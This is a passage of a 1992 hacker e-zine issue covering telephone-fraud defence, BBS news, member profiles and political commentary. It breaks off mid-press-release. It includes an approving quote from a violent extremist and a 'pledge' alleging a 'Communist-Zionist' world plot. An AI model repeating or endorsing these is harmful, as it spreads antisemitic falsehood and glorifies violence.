home *** CD-ROM | disk | FTP | other *** search
/ The Hacker Chronicles - A…the Computer Underground / The Hacker Chronicles - A Tour of the Computer Underground (P-80 Systems).iso / miscpub2 / phantsy8.txt < prev    next >
Text File  |  1992-10-02  |  51KB  |  1,250 lines

  1.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2.       =                                                               =
  3.       -                WELCOME TO THE EIGHTH ISSUE OF                 -
  4.       =                                                               =
  5.       -                        -=>PHANTASY<=-                         -
  6.       =                                                               =
  7.       -               A PUBLICATION AND NEWSLETTER OF                 -
  8.       =                                                               =
  9.       -                             THE                               -
  10.       =                        INTERNATIONAL                          =
  11.       -                         INFORMATION                           -
  12.       =                          RETRIEVAL                            =
  13.       -                            GUILD                              -
  14.       =                                                               =
  15.       -        Hacking,Phreaking,Anarchy,Survivalism,Commentary       -
  16.       =                                                               =
  17.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  18.  
  19.            Volume Number Three,Issue Number Eight Dated 6/05/92
  20.                Editor: Mercenary@f515.n141.z1.fidonet.org
  21.  
  22.              Article Submissions: The Mercenary/IIRG
  23.                                   862 Farmington Avenue
  24.                                   Suite 306
  25.                                   Bristol,Ct 06010
  26.  
  27.            IIRG World Headquarters BBS: Dark Shadows 
  28.                                         19.2/9600 Baud HST
  29.                                         24 Hours a Day
  30.                                         1.2 Gigs Online
  31.                                         (203)-628-9660
  32.  
  33.         Table of Discontents:
  34.  
  35.           
  36.           [1] Quick Comment
  37.               By: Mercenary
  38.  
  39.           [2] Communists Alive and Well in the U.S.
  40.               By: Red Dawn
  41.              
  42.           [3] TeleFraud: (A Case Example)
  43.               By: Anonymous
  44.  
  45.           [4] IIRG Members Profiles: Rowdy Roddy Piper
  46.  
  47.           [5] New World Order Pledge of Dis-Allegiance
  48.               Provided By: Saint Anarchy
  49.  
  50.           [6] IIRG FREEBIES: New Section Devoted to promotions
  51.                              available to our readers!
  52.  
  53.           [7] PHANTASY TIDBITS: News and Views of Interest
  54.                      
  55.  
  56.           [8] FOR THE PEOPLE
  57.               Supplied By: Bulletin Boards Across the Country
  58.               Edited by: Mercenary 
  59.                     
  60.                       1. Michelangelo Source Code
  61.                       2. Phil Katz Warning
  62.                       3. Virus Poem
  63.  
  64.  
  65.           [9] Listing of PHANTASY Distribution Sites
  66.  
  67. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  68.  
  69.     OFFICIAL DISLAIMER...
  70.  
  71.     All information in PHANTASY is from USER contributed material
  72.     The Publishers and Editors of PHANTASY and THE IIRG disclaim
  73.     any liability from any damages of any type that the reader or
  74.     user of such information contained within this newsletter may encounter
  75.     from the use of said information. All files are brought to you for
  76.     entertainment purposes only! We also assume all information infringes
  77.     no copyrights and hereby disclaim any liability.
  78.  
  79.     PHANTASY is (C) 1990 by The IIRG
  80.     IIRG and INTERNATIONAL INFORMATION RETRIEVAL GUILD is (C) 1982
  81.  
  82. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  83.  
  84.  Section [1]: Quick Comment
  85.               By: Mercenary
  86.  
  87.         ATTENTION!! All File creators,Publishers,BBS-aholics
  88.                     the Former IIRG WHQ Runestone BBS is gone.
  89.                     Please do not list it in your files.
  90.                     The New WHQ is:
  91.  
  92.  
  93.            IIRG World Headquarters BBS: Dark Shadows 
  94.                                         19.2/9600 Baud HST
  95.                                         24 Hours a Day
  96.                                         1.2 Gigs Online
  97.                                         (203)-628-9660
  98.  
  99.  
  100. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  101.  
  102.  Section [2]: Communists Alive and Well in the U.S.
  103.               By: Red Dawn
  104.  
  105.   The Berlin Wall came down, and its about time. But the RED Menace is alive
  106.  and Well folks. The So called Russian Republics (Soviet DisUnion) haven't
  107.  gone anywhere. So why are the piss ant politicians in the U.S. rolling over
  108.  and playing Dead? Money, Yes its that simple Money.
  109.   One world Government means power and power means money and as long as our
  110.  leaders are more concerned about filling thier pockets and not filling
  111.  peoples stomachs, were on our own. 
  112.   The Chinese Communists just exploded the largest underground nuclear blast
  113.  ever, the Soviets still have there nukes and the PLP is alive and well here
  114.  in the U.S.
  115.   On a recent jaunt up to MIT, I was approached by a PLP (Progressive Labor
  116.  Party) member. The PLP is the American Communist Party for those who are new
  117.  to this. He asked if I'd like to buy a copy of "Challenge" (The Revolutionary
  118.  Communist Newspaper) I said No, but I'll take this copy for free comrade.
  119.  and walked off with the poor little Reds paper.
  120.   NOTE: Please dont feel bad for the Red, Communism states whats yours is mine
  121.         so I was just teaching him about true Communism control
  122.   Now the PLP is getting smart, they are recruiting Puerto Ricans and other
  123.  third world spanish speakers, as the lead story is "STOP RACIST REPATRIATION
  124.  OF HAITANS" and the paper is now half spanish.
  125.   What better way to boost your cause then appeal to an already unrestful
  126.  group of people.
  127.   Well I say enough, lets show the Communists that we can take America Back
  128.  by unseating mailing them your thoughts.
  129.  
  130.  I'd Advise this on a Post Card:
  131.  
  132.   We Love America,and not Karl Marx.... Signed a Concerned American
  133.  
  134.  Mail to: The Progressive Labor Party
  135.           231 West 29th Street
  136.           Room 502
  137.           New York,NY 10001
  138.  
  139.  Or Call: (212)-629-0002
  140.  
  141. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  142.  
  143.  GIVE YOUR SOUL TO GOD AND PICK UP YOUR GUN, ITS TIME TO DEAL IN LEAD.
  144.  WE ARE THE LEGIONS OF THE DAMNED,THE ARMY OF THE ALREADY DEAD.
  145.  
  146.                                    Robert J. Matthews
  147.  
  148. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  149.  
  150.  Section [3]: TeleFraud: (A Case Example)
  151.               By: Anonymous
  152.  
  153.   Hacking and Phreaking has long been a game of cat and mouse, between
  154.  Hacker and System Administrator. In a role reversal I'd like to present
  155.  the response of an Undisclosed Insurance Company to hackers penetrating
  156.  thier system by presenting the memo distributed to system operators.
  157.  
  158. -------------------------------------------------------------------------------
  159.  From the Director of Systems Security to all employees:
  160.  
  161.   We have experienced telephone fraud (TeleFraud) in which outsiders,
  162.  (I.E. Hackers) penetrated a regional office telephone system and made long
  163.  distance calls that were charged to the company (In one case the cost of
  164.  those calls was about $27,000) A number of steps are being implemented to
  165.  elimanate this exposure) We want to inform you about some of them, and ask
  166.  for your help and cooperation.
  167.  
  168.  NOTE: This article may contain terminology new to you. A "Definition of Terms"
  169.        is included on the last page to help clarify these terms.
  170.  
  171.  
  172.  BACKGROUND:
  173.  
  174.   The most common form of telefraud involves the use of 800 numbers,credit
  175.   cards, and third party calling. Hackers get these numbers from a number of
  176.   sources, such as:
  177.  
  178.   A. Advertisements
  179.  
  180.   B. Eavesdropping (e.g. when you charge your telephone call to another number
  181.      while using a public telephone)
  182.  
  183.   C. Using old company telephone books and manuals that contain numbers of
  184.      Key System or Private Branch Exchange (PBX) systems, which are the heart
  185.      of our internal telephone system.
  186.  
  187.   Technically sophisticated hackers dial these numbers, and through computer
  188.  program routines, determine authorization codes.
  189.   Having learned these codes, they post them on computer bulletin boards or
  190.  sell them. Literally within minutes unauthorized calls are passing through
  191.  the system.
  192.   To reduce or eliminate this exposure, our department as well as others are
  193.  working together to protect our telephone systems. Some of these protection
  194.  measures include:
  195.  
  196.  1. Development and implementation of controls in conjuction with our telephone
  197.     vendors (e.g. AT&T and MCI) to restrict access to certain telephone
  198.     features. Some of these controls include prohibiting the use of Remote
  199.     Access,trunk to trunk,and DISA services.
  200.  
  201.  2. Making you, as telephone users, aware of this problem and identifying ways
  202.     you can help. This memo is part of this program.
  203.  
  204.  HOW CAN YOU HELP?:
  205.  
  206.  Here are some suggestions:
  207.  
  208.  Telephone Credit Cards:
  209.  
  210.   1. Don't give your credit card number to anyone
  211.   2. When calling from a payphone, use card readers whenever possible.
  212.   3. Don't read the number loud enough for others to hear, or let others
  213.      observe you entering your number.
  214.   4. Report lost or stolen cards immediately.
  215.   5. Use your body to block the view of someone who may be watching to see the
  216.      access code you are punching into the telephone.
  217.   
  218.  800 Service:
  219.  
  220.   1. Don't install an 800 number unless it's absolutely necessary.
  221.   2. Remove the line when it's no longer needed.
  222.   3. Limit 800 service to applications that are answered by people.
  223.   4. Avoid 800 service to Phonemail or Voice Response Units (VRU).
  224.  
  225.  International/Domestic Toll Calls:
  226.  
  227.   1. Block country and/or area codes that you don't call.
  228.   2. Limit the use of International Class of Service at the handset level.
  229.   3. Block 900 calls with the local telephone company.
  230.  
  231.  Dial Data Lines:
  232.  
  233.   1. Block third party calling with the local telephone company.
  234.   2. Establish VNET range restrictions
  235.  
  236.  Remote Access:
  237.  
  238.   1. Disable this feature on the PBX. We have surveyed our PBX vendors
  239.      country-wide to ensure these facilities are not enabled.
  240.  
  241.  Trunk-to-Trunk:
  242.  
  243.   1. Disable this feature on the PBX. We have surveyed our PBX vendors
  244.      country-wide to ensure these facilities are not enabled.
  245.  
  246.  Phonemail:
  247.   
  248.   1. Change passwords frequently
  249.   2. Deactivate unused mailboxes
  250.   3. Limit the number of "Guest" mailboxes
  251.   4. Don't publish the system access number to anyone who doesn't use
  252.      phonemail.
  253.   5. Lock out the subscriber after three unsuccessful attempts to enter the
  254.      mailbox.
  255.   6. Keep system administrator ID's secret and change them frequently.
  256.   
  257.  Third Party Calling:
  258.  
  259.   1. Request the local telephone company to block third party calling on
  260.      dial data,fax,and private lines.
  261.   2. Limit the installation of private lines
  262.  
  263.  PBX (Private Branch Exchange):
  264.  
  265.   1. Do not reveal maintenance port passwords to callers without positive ID
  266.   2. Delete unused extensions
  267.  
  268.  VRU (Voice Response Units):
  269.  
  270.   1. Do not enable trunk-to-trunk transfer.
  271.   2. Program only a select number of extensions to which callers can be
  272.      transferred (i.e. establish a table of extensions).
  273.   3. Do not program station transfer
  274.   4. Passwords, (e.g. logon ID's customer PIN's) should be carefully protected
  275.      and changed frequently.
  276.  
  277.  Automated Attendant:
  278.  
  279.   1. Do not enable trunk-to trunk transfer.
  280.   2. Do not program station transfer
  281.   3. Delete unused extensions
  282.   4. Deactivate software features if not in use.
  283.  
  284.  Hardcopy Listings:
  285.  
  286.   1. Properly dispose of old telephone books,manuals,or telephone bills that
  287.      contain sensitive telephone numbers.
  288.   2. Review all telephone charges,looking for patterns and excessive charges.
  289.  
  290.  Dial Access to Computers:
  291.  
  292.   1. Secure dial lines to all computer systems.
  293.  
  294.  Miscellaneous:
  295.  
  296.   1. Be cautious of unusual situations with your telephone system, such as
  297.      busy signals at odd times.
  298.  
  299.  
  300.                           DEFINITION OF TERMS
  301.  
  302.   
  303.    PBX
  304.  
  305.    Private Branch Exchange. Private automatic system that provides for the
  306.    switching of calls internally, and to and from the public telephone
  307.    network.
  308.  
  309.    Trunk-to-Trunk
  310.  
  311.    A "trunk" is the telephone line that connects a PBX to the telephone
  312.    company. Therefore a trunk-to-trunk connection ties a PBX system to the
  313.    telephone company.
  314.  
  315.    DISA
  316.  
  317.    Stands for Direct Inward System Access. This feature gives an outside
  318.    caller the ability to dial directly into a PBX system, without attendant
  319.    (i.e. operator) intervention, and gain access to the PBX system facilities
  320.    and outgoing circuits. DISA software should be disabled, thus eliminating
  321.    this feature/exposure.
  322.  
  323.    Voice Mail
  324.  
  325.    Hardware and software products that can be integrated or peripheral to a
  326.    PBX system, allowing users to send,receive,and redirect voice messages
  327.    through office telephone systems and computers.
  328.  
  329.    Automated Attendant
  330.  
  331.    An automated telephone system used to accept incoming calls and direct
  332.    their callers to specific extensions based upon the caller entering touch
  333.    tone numbers. For example, a hacker could call someones Voicemail mailbox
  334.    from the outside and try to break in.
  335.  
  336.    VRU (Voice Response Unit) 
  337.  
  338.    An interactive system that interfaces between the PBX and host computer
  339.    based upon information provided by the caller (e.g. account number,social
  340.    security number)
  341.  
  342.    Remote Access
  343.  
  344.    Allows a caller at a remote location to access PBX features by telephone.
  345.    Individual authorization codes are usually required. Remote access allows
  346.    the caller to potentially access an outside (e.g. long distance) line,
  347.    and is usually accomplished through the use of DISA or automated
  348.    attendant features.
  349.  
  350.    VNET (Virtual Network)
  351.  
  352.    A registered MCI service that offers a range of telephone limits and/or
  353.    restrictions (e.g. allows calls only within U.S., does not allow calls to
  354.    Virgin Islands,etc.)
  355.  
  356.    Key System:
  357.  
  358.    A small, multi-line internal telephone system similar to a PBX.
  359.    Norstar,Spirit,and Merlin are examples of a key system.
  360.  
  361.  
  362.  
  363.    Remember: All of us are potential victims of telephone fraud. Hackers are
  364.              determined to use our telephone system and not pay for that
  365.              service. Please be as determined to ensure they do not.
  366.  
  367. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  368.  
  369.             ONE CRIME IS CONCEALED BY THE COMMISSION OF ANOTHER
  370.    
  371.                                                Seneca
  372.  
  373. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  374.  
  375.  Section [4]: IIRG Members Profiles: Rowdy Roddy Piper
  376.  
  377. ------------------------------------------------------------------------------
  378.                            Rowdy Roddy Piper
  379. ------------------------------------------------------------------------------
  380.  
  381. Handle: Rowdy Roddy Piper
  382. Call him: Piper
  383. Past handles: None
  384. Handle origin: Wrestler Rowdy Roddy Piper of WWF fame
  385. Past Computers: Commodore 64  With ICT Data Chief
  386.                 Commodore 128
  387.                 Amiga 1000
  388.                 286/12
  389.  
  390. Present Computer: 386/33
  391.                   1300 Megs Storage
  392.                   Courier HST
  393.                   Courier HST Dual Standard
  394.  
  395.  
  396. Sysop: Pipers Pit BBS 
  397.  
  398. Background:
  399.  
  400.    Piper Started his original Commodore oriented BBS in March 1985. The Board
  401.   was originally run off of a C-64 with 2 SFD 1001's. Continually upgrading his
  402.   system Piper switched from his original C-Net configuration to Color 64
  403.   with a C-128 with 1750 Ram expander and 2 ICT Data Chief HFD20's.
  404.    It was at this time that Piper met Mercenary at the now defunct CompuTech
  405.   systems and started attending the original IIRG meetings at the Bar and
  406.   pizza joint next door.
  407.    With the Commodore community rapidly dwindling and the IIRG no longer
  408.   supporting the C64/128, Piper sold his Commodore BBS for a $400.00 profit
  409.   over what he invested in it and Bought a 286/12 and an Amiga 1000 with
  410.   1.5 megs.
  411.    Now, with the his vast majority of users being IBM, Piper has switched 
  412.   to a 386/33 Tower with 1300 Megs of storage,2 Nodes (HST and HST D/S.
  413.    But being true to his roots, Piper still supports the Amiga line.
  414.    
  415.   
  416. Pipers Favorite Things
  417. ----------------------
  418.  
  419.      Running his BBS
  420.      Music (Extensive CD Collection)
  421.      The one month his phone bill ran under $100.00
  422.  
  423. Most Memorable Experiences
  424. --------------------------
  425.  
  426.      Selling his original commodore BBS for $400.00 more than he originally
  427.      purchased the Equipment for, and passing out at the 1989 IIRG Hack
  428.      Bash before the keg was tapped.
  429.  
  430.  
  431. People to Mention
  432. -----------------
  433.  Thanks to: Pie Man, 
  434.             Mercenary, a downright strange individual
  435.             Anubis, an even stranger individual
  436.             The now defunct CompuTech systems and its owner Redbone
  437.             
  438.  Fucks to:  Internal Revenue, America's Legal Organized Crime Syndicate
  439.             Credit Bureaus, Go ahead---Make my Limit
  440.             and 95% of all elected officials
  441.  
  442. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  443.   
  444.     A NICKNAME IS THE HEAVIEST STONE THE DEVIL CAN THROW AT A MAN
  445.  
  446.                                                   Anon
  447.  
  448. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  449.  
  450.  Section [5]: New World Order Pledge of Dis-Allegiance
  451.               Provided By: Saint Anarchy
  452.  
  453.    As our brave and trustworthy leaders usher in there new world order,
  454.    I suggest each one of you memorize this Pledge to it.
  455.  
  456.    We pledge dis-allegiance to the United Nations flag and the confusion,
  457.   the treason,the wars,and the bloodshed for which it stands.
  458.    One World (under Satan), uniting all nations under one Communist-Zionist
  459.   international economic control.
  460.    Promoting (under the guise of benevolence and welfare) Metro Government,
  461.   Regionalization,Urban Renewal,Model Cities,causing distress to young and
  462.   old,totally changing our form of government, and working toward a One
  463.   World Bank (Acclomplished, a One World Government,and a One World Church,
  464.   without God and his Holy Word, the Bible. In his name we reject and defy
  465.   the United Nations Flag and the totalitarianism for which it stands.
  466.  
  467. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  468.  
  469.    FREEDOM HATH A THOUSAND CHARMS TO SHOW
  470.                          THAT SLAVES HOWE'ER CONTENDED NEVER KNOW
  471.  
  472.                                                Cowper
  473.  
  474. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  475.  
  476.  Section [6]: IIRG FREEBIES: A new section to Phantasy
  477.               BY: Mercenary
  478.  
  479. -------------------------------------------------------------------------------
  480.  [1] Security for VMS Systems Handbook
  481.      Available from Digital Equipment Corporation
  482.      Free of Charge
  483.      Call 1-800-332-4636 Extension: SECURE
  484. -------------------------------------------------------------------------------
  485.  [2] Free $15.00 Introductory Usage to CompuServe
  486.      Free Complimentary subscription to CompuServe Magazine
  487.      Compliments of Digital Equipment Corporation
  488.      Call 1-800-524-3388 Ask for Represenative #332
  489. -------------------------------------------------------------------------------
  490.  [3] ARAGO Professional dBASE
  491.      Call 1-800-228-3295
  492.      Ask for Free Demo Disk
  493. -------------------------------------------------------------------------------
  494.  [4] Flow Charting 3
  495.      Call 1-800-525-0082 Extension 1117
  496.      Ask for Free Interactive Demo Disk
  497. -------------------------------------------------------------------------------
  498.  [5] Vermont Views
  499.      Portable User-Interface for Dos,Unix,Posix,VMS...
  500.      Free Demo Kit
  501.      Call 1-800-848-1248
  502.      Mention Offer #303
  503. -------------------------------------------------------------------------------
  504.  [6] National Instruments
  505.      Lab Programs
  506.      Free Demo Disks
  507.      1-800-433-3488
  508. -------------------------------------------------------------------------------
  509. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  510.  
  511.  Section [7]: PHANTASY TIDBITS: News and Views of interest from around the
  512.                                 Computer World
  513.  
  514. -------------------------------------------------------------------------------
  515.  
  516.                        I GOT EM,I GOT EM, I GOT EM....
  517.  
  518.  Arizona Law officers are fuming that the U.S. Justice Department is taking
  519.  credit for the first successful prosecution under the Operation Sundevil 
  520.  computer crime investigation. They point out that they nabbed and convicted
  521.  two hackers swept up in the nationwide crackdown on computer crime several
  522.  months ago. One of the hackers is still doing time in a halfway house after
  523.  spending six months in "shock incarceration," a boot camp for first time
  524.  offenders.
  525.  
  526. -------------------------------------------------------------------------------
  527.  
  528.                          POOR LITTLE BIG BROTHER.... 
  529.  
  530.  Difficulties tapping advanced digital telephone networks for criminal
  531.  investigations have inspired the Federal Bureau of Investigation to propose
  532.  legislation requiring carriers to modify their networks to accommodate court
  533.  approved wiretaps. The multimillion dollar cost of re-engineering the
  534.  networks would be borne by rate payers. Civil liberties groups said a built
  535.  in tapping capability might encourage overly broad government surveillance.
  536.  
  537. -------------------------------------------------------------------------------
  538.  
  539.               COULD I GET SOME MINT JELLY WITH THAT PLEASE?
  540.  
  541.  A man charged with stealing computer boards from Digital Equipment Corporation
  542.  between February and October 1990 recently received the severed head of a lamb
  543.  wrapped in towels through the U.S. Mail. The box arrived at the Lexington,
  544.  Mass., home of Edward Desmond Jr. on Feb 28th. Desmond had cooperated with the
  545.  government during part of the 2 1/2 year investigation, which led to the
  546.  indictment of 16 people. A plea agreement with Desmond was reportedly 
  547.  rescinded after he was caught commiting other crimes.
  548.  
  549. -------------------------------------------------------------------------------
  550.  
  551.               INTERNET ADVISORY BOARD SETS S.N.M.P. SECURITY RULES
  552.  
  553.  The Simple Network Management Protocol (SNMP) security specifications now
  554.  before the Internet Advisory Board would provide the following features:
  555.  
  556.  1. A data-encryption standard based specification that encrypts messages
  557.     between the SNMP manager and agent. This is useful for sending down new or
  558.     updated keys that determine what management functions a SNMP station can
  559.     access or that define authorization levels within a station.
  560.  
  561.  2. Origin Authentication that prevents unauthorized users who have obtained
  562.     an SNMP workstations access code from masquerading as an authentic user.
  563.  
  564.  3. Replay protection that keeps a user from delaying an SNMP transmission,
  565.     such as a command to take a workstation offline, and sending it at a later
  566.     date.
  567.  
  568.  4. Message integrity that keeps authorized users from changing the contents
  569.     of a SNMP message.
  570.  
  571. -------------------------------------------------------------------------------
  572.  
  573.                   BOOK PUSHER SEEKS TO INFLATE EGO
  574.  
  575.  Computer Security Expert Winn Schwartau, whose book, Terminal Compromise,
  576.  describes how a terrorist gang could paralyze the U.S. with a computer virus,
  577.  sees a parrallel between his text and real life.
  578.  "When the Michelangelo virus scare began, it was eerie, like somone had lifted
  579.  the events right out of my book," he says. "Viruses are evolving into a
  580.  terrorist's weapon and are certainly a viable means of waging warfare."
  581.  Terminal compromise is published by Pittsburg-Based Inter-Pact press.
  582.  
  583.  IIRG Note: This Jack Ass will say anything to sell his book, so save the 
  584.             $19.95 and go out and get drunk instead. The book is pure
  585.             garbage.
  586.  
  587. -------------------------------------------------------------------------------
  588.  
  589.                    JACKASS's and MORE JACKASS's
  590.  
  591.  The Associated press reports that the theft of a portable PC in Australia was
  592.  solved when the thief sent a fax to the unit's maker, DFM Systems of Des
  593.  Moines,Iowa asking for a power cord,documentation, and software.
  594.  What the crook didn't know was the DFM TraveLite PC was the only such system
  595.  in Australia. The unit was owned by Sydney based ACEL, which the thief had
  596.  burglarized. DFM contacted ACEL's managing director, who then contacted the
  597.  police. A ploice officer later contacted the crook, who had supplied his
  598.  street address on the fax.
  599.  
  600. -------------------------------------------------------------------------------
  601.                       
  602.                 I HEAR YA' KNOCKIN, BUT YA' CAN'T COME IN
  603.  
  604.  Whozz Calling uses your local phone company's Caller ID service to intercept
  605.  the ID information before you answer your phone. The product sends the 
  606.  identification of the caller via standard RS-232 serial wire to your computer
  607.  which looks up the caller name,displays it,stores it,elects not to answer the
  608.  call, or diverts the call to an answering machine.
  609.  A DOS compatible,menu driven TSR program can optionally pop up information
  610.  about the caller,bringing up the callers ID before you answer the phone.
  611.  
  612.  Price: $79.00 (Requires Caller ID)
  613.  Contact: Zeus Phonstuff
  614.           1000 Holcomb Woods Parkway
  615.           Suite 410-C
  616.           Roswell,GA 30076
  617.           (404)-587-1541
  618.           (404)-587-1609 (FAX)
  619.  
  620. -------------------------------------------------------------------------------
  621.  
  622.                 TWO AT CORNELL INDICTED IN VIRUS CASE
  623.  
  624.  Two Cornell University students now have been indicted for felonies in
  625.  connection with the computer virus case that came to light last
  626.  February at the Ithaca, N.Y., university.
  627.  
  628.  David Blumenthal and Mark Pilgrim are accused of embedding a virus in
  629.  three Apple Macintosh computer games that were sent from Cornell's
  630.  computer center to an archive at Stanford University. Authorities say
  631.  from there, the games were duplicated and wound up in computers across
  632.  the U.S., Japan and Great Britain.
  633.  
  634.  Blumenthal, 20, and Pilgrim, 19, who, in convicted, face a maximum
  635.  four years in prison, were arrested in February on misdemeanor
  636.  charges, which were increased to felonies because the virus is
  637.  believed to have caused more than $1,000 in damage, said county
  638.  District Attorney George Dentes.
  639.  
  640. -------------------------------------------------------------------------------
  641.  
  642.               AT&T INTRODUCES PRODUCTS TO FIGHT PHONE FRAUD
  643.  
  644.   NEW YORK (Reuter) -- American Telephone & Telegraph Co. rolled out a new
  645.  security program yesterday aimed at protecting businesses from anyone who
  646.  might try to "steal" their long-distance telephone service.
  647.  
  648.   Branding phone fraud as a nationwide problem costing upwards of $1.2
  649.  billion a year, the company said its AT&T NetProtect program gives customers
  650.  the products, services and education they need to combat such fraud, as well
  651.  as protection against financial liability.
  652.  
  653.   Long-Distance fraud often takes place when an outsider, say a computer
  654.  hacker, cracks the access codes to a company's private branch exchange, or
  655.  PBX -- an internal phone system that allows easy access to branch offices
  656.  and major customers.
  657.  
  658.   The PBX can then be used to place long-distance or international calls as
  659.  if by someone inside the company.
  660.  
  661.   The practice, a misdemeanor crime with no jail sentence in many states,
  662.  typically is done for monetary gain. The "stolen" service can be sold on the
  663.  street, sometimes providing drug traffickers with international calls that
  664.  cannot be traced.
  665.  
  666.   "Long-distance fraud is a serious criminal problem, and we believe AT&T
  667.  should stand squarely with our customers against the criminals who steal the
  668.  service," said Joseph Nacchio, president of AT&T's Business Communications
  669.  Services division.
  670.  
  671.   AT&T, the long-distance carrier created by the 1984 breakup of the former
  672.  Bell telephone system, said its new program would relieve customers from
  673.  liability for the fraud.
  674.  
  675.   The company this week began monitoring its toll-free 800 service at no
  676.  extra charge to prevent fraud. From Aug. 1, it also will monitor inter-
  677.  national long-distance service to countries experiencing high levels of
  678.  fraud.
  679.  
  680.   An AT&T spokesman declined to disclose the cost for enhanced and premium
  681.  services that protect customers from financial liability, saying the cost
  682.  structure has not yet been filed with the Federal Communications Commission.
  683.  
  684.   Other packages include a $1,995 software package that alerts customers to
  685.  unusual calling patterns and a $150 an hour intervention service under which
  686.  AT&T experts try to stop fraud while it is in progress.
  687.  
  688. -------------------------------------------------------------------------------
  689.  
  690.                      WORLDWIDE MOBILE DATA SOLUTIONS
  691.  
  692.   ATLANTA -- May 18, 1992 -- Digital Equipment Corporation, RAM Mobile
  693.  Data, and BellSouth Enterprises, Inc. today announced a worldwide
  694.  agreement to provide mobile data solutions based on the Mobitex
  695.  mobile packet radio network.
  696.   Under the agreement, Digital will offer two-way wireless
  697.  electronic mail to its more than three million existing ALL-IN-1
  698.  integrated office system customers. Digital is developing a
  699.  version of its Mobilizer for ALL-IN-1 software that will enable
  700.  users of portable MS-DOS PCs to access ALL-IN-1 electronic mail
  701.  applications without a connection to a telephone outlet.
  702.   Digital plans to provide the same services on the Mobitex
  703.  mobile network in the United Kingdom. In addition, wireless
  704.  electronic mail services will be offered to customers in several
  705.  other countries where RAM and BellSouth plan to operate Mobitex
  706.  networks. Digital's wireless electronic mail offering will be
  707.  available in the first quarter of calendar year 1993.
  708.   Digital also announced the DECmobile program, under which
  709.  the company will deliver fully integrated, end-to-end mobile data
  710.  communications solutions that extend enterprise computing
  711.  networks to mobile users. The announcements were made at the ICA
  712.  telecommunications industry conference held here May 18-21.
  713.  "With these announcements, Digital is moving aggressively
  714.  into the fast-growing mobile data market," said Ernst E.
  715.  Wellhoener, vice president of Digital's Telecommunications
  716.  Business Group. "We are supporting our commitment with
  717.  substantial investments of time, money, and resources to build
  718.  the kinds of mobile data solutions our customers require."
  719.   Digital Becomes RAM Mobile Data Systems Integrator
  720.  Under the DECmobile program, Digital will offer customers
  721.  complete mobile data solutions, acting as systems integrator for
  722.  RAM Mobile Data and other service providers.  Digital will
  723.  provide a single point of contact for customers seeking to
  724.  benefit from new mobile data communications services.
  725.   Digital is entering into business relationships with leading
  726.  suppliers of radio modems, handheld PCs, and cellular devices.
  727.  The company currently has relationships with Ericsson Mobile
  728.  Communications AB, Fujitsu Personal Systems (formerly Poqet
  729.  Computer Corporation), and Husky Computers, Inc.
  730.  "The move into mobile data represents a natural progression
  731.  for Digital, a leader in providing networked computer systems and
  732.  one of the computer industry's foremost systems integrators,"
  733.  Wellhoener said.  "Our ability to provide 'one-stop shopping' for
  734.  mobile data solutions helps simplify what might otherwise be a
  735.  difficult process for our customers, enabling them to get
  736.  up-to-speed faster and more cost-effectively."
  737.   Wellhoener said Digital chose Mobitex networks because they
  738.  are feature-rich, sophisticated, and highly efficient. "And
  739.  perhaps most important, the worldwide scope of Mobitex networks
  740.  will enable us to meet the needs of today's multinational
  741.  enterprises," Wellhoener added.
  742.  
  743.   Mike Harrell, president of BellSouth Mobile Data, Inc., said
  744.  the alliance would enable mobile data network subscribers to take
  745.  advantage of Digital's worldwide systems integration
  746.  capabilities. "Aligning ourselves with an experienced systems
  747.  integrator ensures our network subscribers have the most
  748.  effective solutions," Harrell said. "We can now expand the market
  749.  for Mobitex into a broad range of networked computer applications."
  750.   Carl Robert Aron, chairman and CEO of RAM, said, "ALL-IN-1
  751.  is the world's leading host-based application that includes
  752.  electronic mail.  RAM's Mobitex network is the only mobile data
  753.  network in operation which automatically delivers E-mail messages
  754.  to mobile professionals wherever they are within the network
  755.  service area. The marriage of Mobitex and Mobilizer for ALL-IN-1
  756.  was inevitable."
  757.   Digital Develops Mobile Data Products and Programming Tools
  758.  In addition to developing a wireless interface for its
  759.  Mobilizer for ALL-IN-1 product, Digital is developing an open
  760.  software architecture and a single set of application programming
  761.  interfaces that will be available to software developers. The
  762.  architecture and application programming interfaces, or APIs,
  763.  facilitate the integration of new and existing mobile applications
  764.  for RAM's and other service providers' networks.  APIs make it easy
  765.  for developers to write mobile data applications.
  766.   BellSouth Mobile Data is a subsidiary of BellSouth
  767.  Enterprises, Inc., the holding company that manages a group of
  768.  companies for BellSouth Corporation that provide wireless
  769.  telecommunications, advertising and publishing, and
  770.  information-based services throughout the world.
  771.   RAM Mobile Data operates a wireless data communications
